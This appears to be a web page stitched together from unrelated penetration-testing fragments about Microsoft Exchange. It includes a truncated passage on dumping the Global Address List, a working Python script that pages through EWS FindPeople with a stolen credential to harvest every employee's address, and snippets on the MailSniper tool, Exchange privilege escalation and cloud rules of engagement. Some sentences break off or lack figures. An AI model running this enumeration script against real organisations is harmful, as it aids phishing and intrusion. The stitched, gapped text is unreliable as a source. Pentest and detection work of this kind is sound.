On external penetration tests, the reconnaissance phase very often yields a handful of email addresses or usernames belonging to the target organization. If we can find valid credentials for even one of them, and the organization exposes an Outlook Web Access or Exchange Web Services portal, it is possible to download the entire Global Address List from the Exchange server. A single valid credential therefore gives us the email address of every employee in the organization. There is an EWS function called FindPeople that will pull back the entire GAL with a single request. Unfortunately, this function is only implemented in Exchange version
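To make the FindPeople technique concrete, here is an added example that is not MailSniper's code and not part of the original post. It builds the EWS FindPeople SOAP request against the `directory` distinguished folder (the GAL), pages through the results using IndexedPageItemView, and parses the personas out of each response. The EWS endpoint path, the Basic-auth sender, the `SMTP` query string and the sample directory served by `fake_ews_server` are all assumptions or constructed data; the response shape follows the documented FindPeopleResponse schema.

```python
"""Dump the Exchange GAL via the EWS FindPeople operation (illustrative, offline-testable)."""
import base64
import urllib.request
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
M_NS = "http://schemas.microsoft.com/exchange/services/2006/messages"
T_NS = "http://schemas.microsoft.com/exchange/services/2006/types"
NS = {"s": SOAP_NS, "m": M_NS, "t": T_NS}


def build_findpeople_request(offset, page_size=100):
    """One page of the directory (GAL) search. 'SMTP' as the query string is an
    assumption: it matches every persona that carries an SMTP address."""
    return f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="{SOAP_NS}" xmlns:m="{M_NS}" xmlns:t="{T_NS}">
  <soap:Header><t:RequestServerVersion Version="Exchange2013"/></soap:Header>
  <soap:Body>
    <m:FindPeople>
      <m:PersonaShape>
        <t:BaseShape>IdOnly</t:BaseShape>
        <t:AdditionalProperties>
          <t:FieldURI FieldURI="persona:DisplayName"/>
          <t:FieldURI FieldURI="persona:EmailAddress"/>
        </t:AdditionalProperties>
      </m:PersonaShape>
      <m:IndexedPageItemView BasePoint="Beginning" MaxEntriesReturned="{page_size}" Offset="{offset}"/>
      <m:ParentFolderId><t:DistinguishedFolderId Id="directory"/></m:ParentFolderId>
      <m:QueryString>SMTP</m:QueryString>
    </m:FindPeople>
  </soap:Body>
</soap:Envelope>"""


def parse_findpeople_response(xml_text):
    """Return ([(display_name, smtp_address), ...], total_in_view) or raise on an EWS error."""
    root = ET.fromstring(xml_text)
    resp = root.find(".//m:FindPeopleResponse", NS)
    if resp is None or resp.get("ResponseClass") != "Success":
        code = root.findtext(".//m:ResponseCode", default="(no ResponseCode)", namespaces=NS)
        raise RuntimeError(f"FindPeople failed: {code}")
    people = []
    for persona in resp.findall("m:People/t:Persona", NS):
        name = persona.findtext("t:DisplayName", default="", namespaces=NS)
        addr = persona.findtext("t:EmailAddress/t:EmailAddress", default="", namespaces=NS)
        if addr:
            people.append((name, addr))
    total = int(resp.findtext("m:TotalNumberOfPeopleInView", default="0", namespaces=NS))
    return people, total


def dump_gal(send_request, page_size=100, max_pages=1000):
    """Page through the whole GAL; send_request(xml) -> response xml.
    Stops on an empty page so a server that ignores Offset cannot loop forever."""
    addresses = {}
    offset = 0
    for _ in range(max_pages):
        people, total = parse_findpeople_response(send_request(build_findpeople_request(offset, page_size)))
        for name, addr in people:
            addresses[addr.lower()] = name
        offset += len(people)
        if not people or offset >= total:
            break
    return addresses


def basic_auth_sender(ews_url, username, password):
    """Assumed transport: POST to /EWS/Exchange.asmx with Basic auth (only works if the
    server permits Basic; NTLM is the common alternative and needs another library)."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()

    def send(xml_body):
        req = urllib.request.Request(ews_url, data=xml_body.encode("utf-8"), method="POST")
        req.add_header("Content-Type", "text/xml; charset=utf-8")
        req.add_header("Authorization", f"Basic {token}")
        with urllib.request.urlopen(req, timeout=30) as r:
            return r.read().decode("utf-8")
    return send


# Constructed sample directory so the example runs offline.
FAKE_DIRECTORY = [
    ("Alice Example", "alice@example.com"), ("Bob Example", "bob@example.com"),
    ("Carol Example", "carol@example.com"), ("Dan Example", "dan@example.com"),
    ("Eve Example", "eve@example.com"),
]


def fake_ews_server(request_xml):
    """Constructed stand-in for EWS: honours Offset/MaxEntriesReturned and answers
    in the FindPeopleResponse shape, so dump_gal's paging logic can be exercised."""
    view = ET.fromstring(request_xml).find(".//m:IndexedPageItemView", NS)
    offset, size = int(view.get("Offset")), int(view.get("MaxEntriesReturned"))
    page = FAKE_DIRECTORY[offset:offset + size]
    personas = "".join(
        f'<t:Persona><t:PersonaId Id="AAA{i}"/><t:DisplayName>{escape(n)}</t:DisplayName>'
        f"<t:EmailAddress><t:Name>{escape(n)}</t:Name><t:EmailAddress>{escape(a)}</t:EmailAddress>"
        f"</t:EmailAddress></t:Persona>"
        for i, (n, a) in enumerate(page, start=offset))
    return (f'<s:Envelope xmlns:s="{SOAP_NS}" xmlns:m="{M_NS}" xmlns:t="{T_NS}"><s:Body>'
            f'<m:FindPeopleResponse ResponseClass="Success"><m:ResponseCode>NoError</m:ResponseCode>'
            f"<m:People>{personas}</m:People>"
            f"<m:TotalNumberOfPeopleInView>{len(FAKE_DIRECTORY)}</m:TotalNumberOfPeopleInView>"
            f"</m:FindPeopleResponse></s:Body></s:Envelope>")


if __name__ == "__main__":
    for addr, name in sorted(dump_gal(fake_ews_server, page_size=2).items()):
        print(f"{addr}\t{name}")
```

Against a live server you would replace `fake_ews_server` with `basic_auth_sender("https://mail.example.com/EWS/Exchange.asmx", "DOMAIN\\user", "password")` (hostname assumed). Defenders can spot this pattern in IIS logs as a burst of EWS POSTs from one account with increasing page offsets; a legitimate Outlook client rarely walks the whole directory.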
Exchange-AD-Privesc: Exchange privilege escalations to Active Directory • Penetration Testing
Meet MailSniper, a new pen tester tool that may be of interest to you if you need to find sensitive data such as passwords, credit card numbers and healthcare data, or need to access databases, or even to discover insider and network architecture information. Beau Bullock, from the penetration testing firm Black Hills Information Security, cited a Mandiant M-Trends Report (PDF) which claimed organizations are compromised an average of days before detecting a breach. A window that long gives attackers plenty of time to locate, compromise and exfiltrate sensitive data; pen testers, however, may only have a window of five days or less to do the same thing in order to prove risk to an organization. While Microsoft Exchange does have tools for searching email, Bullock was intent on creating a tool that could provide a new search function capable of searching every mailbox in a domain for specific terms. It becomes a brand new privilege escalation vector. Invoke-GlobalMailSearch searches through all mailboxes on an Exchange server. Bullock had plenty of other search suggestions which could be used to discover sensitive information, insider intel and network architecture information.
Meet MailSniper, a tool to search Microsoft Exchange emails for sensitive info
This repository provides a few techniques and scripts regarding the impact of a Microsoft Exchange deployment on Active Directory security. For pentesters looking to take control of an AD domain, Exchange is a valid intermediary target. By default the Exchange servers are much less secured than domain controllers, and in the usual permission models they are controlled by distinct groups, which provides numerous alternative targets. Exchange servers are also more difficult to migrate and business critical, so organizations often adopt a slower migration cycle for Exchange than for AD and do not specifically harden the servers.
In many cases, the Microsoft Cloud uses shared infrastructure to host your assets and assets belonging to other customers. Care must be taken to limit all penetration tests to your assets and avoid unintended consequences to other customers around you. These Rules of Engagement are designed to allow you to effectively evaluate the security of your assets while preventing harm to other customers or the infrastructure itself. All penetration tests must follow the Microsoft Cloud Penetration Testing Rules of Engagement as detailed on this page. Your use of the Microsoft Cloud will continue to be subject to the terms and conditions of the agreement(s) under which you purchased the relevant service.